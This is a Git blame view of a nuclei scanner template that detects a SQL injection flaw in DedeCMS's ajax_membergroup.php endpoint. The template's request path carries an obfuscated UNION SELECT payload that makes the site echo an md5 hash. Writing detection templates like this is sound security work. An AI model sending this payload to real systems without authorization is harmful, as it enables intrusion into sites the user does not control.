daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml

31 lines
777 B
YAML
Raw Normal View History

Create dedecms-membergroup-sqli.yaml
2021-03-15 08:01:47 +00:00
id: dedecms-membergroup-sqli
info:
name: DedeCMS Membergroup SQLI
author: pikpikcu
severity: medium
Add description
2021-10-14 12:55:59 +00:00
description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter.
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes
2022-04-22 10:38:41 +00:00
reference:
- http://www.dedeyuan.com/xueyuan/wenti/1244.html
Create dedecms-membergroup-sqli.yaml
2021-03-15 08:01:47 +00:00
tags: sqli,dedecms
Update dedecms-membergroup-sqli.yaml
2022-06-30 03:52:06 +00:00
variables:
num: "999999999"
Create dedecms-membergroup-sqli.yaml
2021-03-15 08:01:47 +00:00
requests:
- method: GET
path:
Update dedecms-membergroup-sqli.yaml
2022-06-30 03:52:06 +00:00
- "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{num}})+--+@`'`"
Create dedecms-membergroup-sqli.yaml
2021-03-15 08:01:47 +00:00
matchers-condition: and
matchers:
- type: word
words:
Update dedecms-membergroup-sqli.yaml
2022-06-30 03:52:06 +00:00
- '{{md5({{num}})}}'
Create dedecms-membergroup-sqli.yaml
2021-03-15 08:01:47 +00:00
part: body
- type: status
status:
- 200